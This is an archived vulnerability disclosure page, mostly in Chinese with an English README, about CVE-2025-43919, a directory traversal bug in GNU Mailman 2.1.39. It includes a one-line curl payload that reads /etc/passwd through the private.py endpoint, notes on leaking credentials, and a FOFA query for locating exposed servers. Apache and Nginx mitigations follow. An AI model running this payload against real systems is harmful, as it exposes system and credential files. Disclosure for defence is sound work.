关联漏洞
标题:
GNU Mailman 安全漏洞
(CVE-2025-43919)
描述:GNU Mailman是美国GNU社区的一套免费的用于管理电子邮件讨论和电子邮件列表的软件。该软件可与Web项目集成,使用户方便管理邮件订阅帐号,并提供内置归档、自动转发处理、内容过滤和反垃圾过滤器等功能。 GNU Mailman 2.1.39版本存在安全漏洞,该漏洞源于目录遍历,可能导致任意文件读取。
描述
A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
介绍
### 🚨 CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)
> A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
📌 **Vulnerability Summary:**
- **Type**: `Directory Traversal` (Unauthenticated)
- **Component**: `private.py` CGI script
- **Affected Endpoint**: `/mailman/private/mailman`
- **Impact**: Disclosure of files like `/etc/passwd`, `.mbox archives`, and `Mailman configs`
- **CVSS Score**: `5.8 (Medium)`
- **CVE ID**: `CVE-2025-43919`
Status: No official patch (Mailman 2.1.x is EOL)
🔥 Proof of Concept:
```
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
```
🧨 Exploitation Scenarios:
- Dump `/etc/passwd`, `configs`, or `mailbox files`
- Leak credentials and sensitive archives
- Chain with other bugs for RCE or escalation
🛡️ Mitigations:
Block access to `/mailman/private` at the web server level:
```
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
```
Or in Nginx:
```
location /mailman/private {
deny all;
return 403;
}
```
⬆️ Migrate to **Mailman** **3.x — 2.x** is EOL and lacks modern protections
🔍 FOFA Query : [app="Mailman"](https://en.fofa.info/result?qbase64=YXBwPSJNYWlsbWFuIg%3D%3D)
📚 Learn more, share responsibly, and keep your infra secure.
🔒 Follow for more **real-world** CVEs, **PoCs**, and **hardening** tips:
👉 [@cybersecplayground](https://t.me/cybersecplayground)
`#bugbounty` `#infosec` `#exploit` `#pentest` `#cve2025` `#directorytraversal` `#linuxsecurity`
文件快照
[4.0K] /data/pocs/66e720ad17cc14d5b730ec0224cf22e54e8a28d7
├── [1.3K] cve_2024_43919_poc.py
├── [1.1K] LICENSE
└── [1.7K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。